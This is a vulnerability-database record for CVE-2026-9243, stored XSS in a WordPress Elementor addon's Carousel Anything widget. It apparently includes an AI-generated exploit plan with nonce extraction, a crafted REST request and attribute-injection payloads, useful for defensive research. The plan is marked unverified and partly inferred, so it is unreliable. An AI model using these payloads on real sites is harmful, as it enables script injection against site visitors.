[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVOLEYLtbVHkVJqGBuOO0p_1xITuctC9AdVGT5fzGIE0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-9243","the-plus-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-carouseldirection-parameter","The Plus Addons for Elementor \u003C= 6.4.15 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'carousel_direction' Parameter","The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'carousel_direction' parameter of the Carousel Anything widget in versions up to, and including, 6.4.15 This is due to insufficient output escaping in the render() function, where the carousel_direction value is placed into an unquoted HTML attribute (dir=) allowing attribute injection despite the use of esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","the-plus-addons-for-elementor-page-builder",null,"\u003C=6.4.15","6.4.16","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-28 18:38:13","2026-05-29 06:43:44",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F699e41ad-1991-4100-9ef2-caea7743e45b?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fmain\u002Fcarousel-anything\u002Fplus-carousel-anything.js","assets\u002Fjs\u002Fmain\u002Fcarousel-anything\u002Fplus-carousel-anything.min.js","assets\u002Fjs\u002Fmain\u002Fgeneral\u002Fplus-animation-load.js","assets\u002Fjs\u002Fmain\u002Fgeneral\u002Fplus-animation-load.min.js","assets\u002Fjs\u002Fmain\u002Fgeneral\u002Fplus-slick-carousel.js","assets\u002Fjs\u002Fmain\u002Fgeneral\u002Fplus-slick-carousel.min.js","assets\u002Fjs\u002Fmain\u002Fplus-extra-adv\u002Fplus-backend-editor.js","assets\u002Fjs\u002Fmain\u002Fplus-extra-adv\u002Fplus-backend-editor.min.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-9243\n\n## 1. Vulnerability Summary\n**CVE-2026-9243** is a Stored Cross-Site Scripting (XSS) vulnerability in **The Plus Addons for Elementor** (versions \u003C= 6.4.15). The vulnerability exists within the **Carousel Anything** widget. Specifically, the `render()` function in the widget's PHP class (likely located in `modules\u002Fwidgets\u002Ftp_carousel_anything.php`, inferred) outputs the user-controlled `carousel_direction` setting into an unquoted HTML `dir` attribute. \n\nWhile the developer utilized `esc_attr()` for the value, the lack of surrounding quotes in the HTML template allows an attacker to use a space character to break out of the `dir` attribute and inject new HTML attributes (Attribute Injection), leading to JavaScript execution.\n\n## 2. Attack Vector Analysis\n- **Target Plugin:** The Plus Addons for Elementor (slug: `the-plus-addons-for-elementor-page-builder`)\n- **Vulnerable Widget:** Carousel Anything (internal name: `tp-carousel-anything`)\n- **Vulnerable Parameter:** `carousel_direction`\n- **Authentication Level:** Contributor+ (any user role with permission to edit posts\u002Fpages using Elementor).\n- **Preconditions:** The plugin must be active, and the attacker must be able to save or update an Elementor-powered post.\n\n## 3. Code Flow (Inferred)\n1. **Input:** A user with Contributor+ privileges edits a post via the Elementor builder.\n2. **Setting:** The user selects the **Carousel Anything** widget and modifies the \"Direction\" (which maps to the `carousel_direction` setting).\n3. **Storage:** Elementor saves the widget configuration as a JSON-encoded string in the `_elementor_data` post meta.\n4. **Sink (PHP):** When the page is rendered, the widget's `render()` method is called.\n   - It retrieves the setting: `$direction = $settings['carousel_direction'];`\n   - It echoes the wrapper: `echo '\u003Cdiv class=\"theplus-carousel-anything-wrapper\" dir=' . esc_attr($direction) . ' ...>';` (Note the missing quotes around the `dir` value).\n5. **Execution:** Since the attribute is unquoted, a payload like `ltr onmouseover=alert(1)` results in:\n   `\u003Cdiv class=\"theplus-carousel-anything-wrapper\" dir=ltr onmouseover=alert(1) ...>`\n   The browser interprets `onmouseover` as a valid event handler attribute.\n\n## 4. Nonce Acquisition Strategy\nExploiting Elementor-based vulnerabilities requires an Elementor REST API nonce or the standard WordPress `_wpnonce`. \n\n### For Contributor+ Attackers:\n1. **Create Page:** The agent should first create a draft or post to use as the target.\n   ```bash\n   wp post create --post_type=post --post_title=\"XSS Test\" --post_status=draft --post_author=2\n   ```\n2. **Access Editor:** Navigate to the Elementor editor for that post ID.\n   `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor\")`\n3. **Extract Nonce:** Use `browser_eval` to extract the REST API nonce from the Elementor configuration object.\n   ```javascript\n   \u002F\u002F JavaScript\n   window.elementorConfig?.api?.nonce\n   ```\n4. **Extract Rest URL:**\n   ```javascript\n   \u002F\u002F JavaScript\n   window.elementorConfig?.api?.root\n   ```\n\n## 5. Exploitation Strategy\nThe goal is to update the `_elementor_data` for a post to include a `tp-carousel-anything` widget with a malicious `carousel_direction`.\n\n### Step 1: Payload Construction\nThe payload needs to be a valid JSON structure for Elementor. The key part is the `settings` object for the `tp-carousel-anything` widget.\n\n**Payload:** `ltr onfocus=alert(document.domain) autofocus`\n\n### Step 2: HTTP Request (Simulating Elementor Save)\nUse the `http_request` tool to send a POST request to the Elementor REST API.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Felementor\u002Fv1\u002Fpages\u002FPOST_ID`\n- **Method:** `POST`\n- **Headers:**\n  - `X-WP-Nonce`: `[Extracted Nonce]`\n  - `Content-Type`: `application\u002Fjson`\n- **Body:**\n  ```json\n  {\n    \"data\": [\n      {\n        \"id\": \"random_id\",\n        \"elType\": \"section\",\n        \"elements\": [\n          {\n            \"id\": \"random_id_2\",\n            \"elType\": \"column\",\n            \"elements\": [\n              {\n                \"id\": \"vulnerable_widget\",\n                \"elType\": \"widget\",\n                \"widgetType\": \"tp-carousel-anything\",\n                \"settings\": {\n                  \"carousel_direction\": \"ltr onmouseover=confirm(1) style=position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;\"\n                }\n              }\n            ]\n          }\n        ]\n      }\n    ]\n  }\n  ```\n  *Note: The `style` attribute expansion ensures the `onmouseover` is easily triggered by the user.*\n\n## 6. Test Data Setup\n1. **Target User:** Create a user with the `contributor` role.\n2. **Plugin Setup:** Ensure \"The Plus Addons for Elementor\" is active.\n3. **Elementor Setup:** Ensure Elementor is active and allowed for the `post` post type.\n\n## 7. Expected Results\n- The REST API should return a `200 OK` status with the updated post data.\n- When viewing the post (`\u002F?p=POST_ID`), the source code should contain:\n  `\u003Cdiv class=\"theplus-carousel-anything-wrapper\" dir=ltr onmouseover=confirm(1) ...>`\n- Moving the mouse over the page should trigger the `confirm(1)` alert.\n\n## 8. Verification Steps\n1. **Check Database via WP-CLI:**\n   ```bash\n   wp post meta get POST_ID _elementor_data\n   ```\n   Verify that the JSON string contains the `onmouseover` payload.\n2. **Inspect Output via CLI:**\n   ```bash\n   curl -s \"http:\u002F\u002Flocalhost:8080\u002F?p=POST_ID\" | grep \"onmouseover=confirm(1)\"\n   ```\n\n## 9. Alternative Approaches\nIf the `dir` attribute is not the only unquoted attribute, check other parameters in the `render()` function of `tp_carousel_anything.php`. \n- **Parameter:** `carousel_direction`\n- **Alternate Payload:** If `onmouseover` is blocked by a WAF, try `onfocus` with `autofocus`:\n  `ltr onfocus=alert(1) autofocus`\n- **JSON Context:** If the frontend JS (`plus-carousel-anything.js`) parses this value from a `data-result` attribute, the injection might also occur within that JSON-encoded attribute if it is also unquoted. \n\n**Refined Path Guess:** \nCheck `the-plus-addons-for-elementor-page-builder\u002Fmodules\u002Fwidgets\u002Ftp_carousel_anything.php` for the string: `dir=\u003C?php echo esc_attr($settings['carousel_direction']); ?>` (without quotes).","The Plus Addons for Elementor plugin (\u003C= 6.4.15) is vulnerable to Stored Cross-Site Scripting via the 'carousel_direction' parameter in the Carousel Anything widget. Due to insufficient output escaping in the PHP render() function, the parameter value is placed into an unquoted HTML attribute (dir=), allowing authenticated attackers with Contributor-level access to perform attribute injection and execute arbitrary scripts.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-plus-addons-for-elementor-page-builder\u002F6.4.15\u002Fassets\u002Fjs\u002Fmain\u002Fcarousel-anything\u002Fplus-carousel-anything.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-plus-addons-for-elementor-page-builder\u002F6.4.16\u002Fassets\u002Fjs\u002Fmain\u002Fcarousel-anything\u002Fplus-carousel-anything.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-plus-addons-for-elementor-page-builder\u002F6.4.15\u002Fassets\u002Fjs\u002Fmain\u002Fcarousel-anything\u002Fplus-carousel-anything.js\t2026-05-14 04:50:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-plus-addons-for-elementor-page-builder\u002F6.4.16\u002Fassets\u002Fjs\u002Fmain\u002Fcarousel-anything\u002Fplus-carousel-anything.js\t2026-05-22 06:50:36.000000000 +0000\n@@ -57,7 +57,8 @@\n \t\t\t\t\t\t\t\t$(\"#\"+connection).find('.info-box-inner[data-slick-index=\"'+parseInt(nextSlide)+'\"]').trigger(\"hover\");\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\n-\t\t\t\t\t\t\tif ( $.isFunction($.fn.plus_infobox_connection) ) {\n+\t\t\t\t\t\t\t\u002F\u002F F-12 fix: $.isFunction removed in jQuery 4. Use typeof.\n+\t\t\t\t\t\t\tif ( typeof $.fn.plus_infobox_connection === 'function' ) {\n \t\t\t\t\t\t\t\tplus_infobox_connection(parseInt(nextSlide),connection);\n \t\t\t\t\t\t\t}\t\t\t\t\t\t\n \t\t\t\t\t\t\t\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-plus-addons-for-elementor-page-builder\u002F6.4.15\u002Fassets\u002Fjs\u002Fmain\u002Fgeneral\u002Fplus-slick-carousel.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-plus-addons-for-elementor-page-builder\u002F6.4.16\u002Fassets\u002Fjs\u002Fmain\u002Fgeneral\u002Fplus-slick-carousel.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-plus-addons-for-elementor-page-builder\u002F6.4.15\u002Fassets\u002Fjs\u002Fmain\u002Fgeneral\u002Fplus-slick-carousel.js\t2026-05-14 04:50:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-plus-addons-for-elementor-page-builder\u002F6.4.16\u002Fassets\u002Fjs\u002Fmain\u002Fgeneral\u002Fplus-slick-carousel.js\t2026-05-22 06:50:36.000000000 +0000\n@@ -46,7 +46,7 @@\n \n         var data = $self[0].dataset;\n \n-        parsedData = data && data.result ? JSON.parse(data.result) : '';\n+        const parsedData = data && data.result ? JSON.parse(data.result) : {};\n         var getDIrection = parsedData.carousel_direction,\n             rtlVal = false;","The exploit targets the 'Carousel Anything' widget. An authenticated attacker with at least Contributor-level privileges can edit a post\u002Fpage using the Elementor builder and add this widget. By modifying the 'Direction' setting (carousel_direction parameter), the attacker can inject a payload like 'ltr onmouseover=alert(1)'. Because the 'dir=' attribute in the generated HTML wrapper is unquoted, the space allows the browser to interpret 'onmouseover' as a new attribute. The payload is stored in the post's metadata and executes whenever a victim views the page and interacts with the carousel area.","gemini-3-flash-preview","2026-06-04 15:28:53","2026-06-04 15:29:58",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","6.4.15","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags"]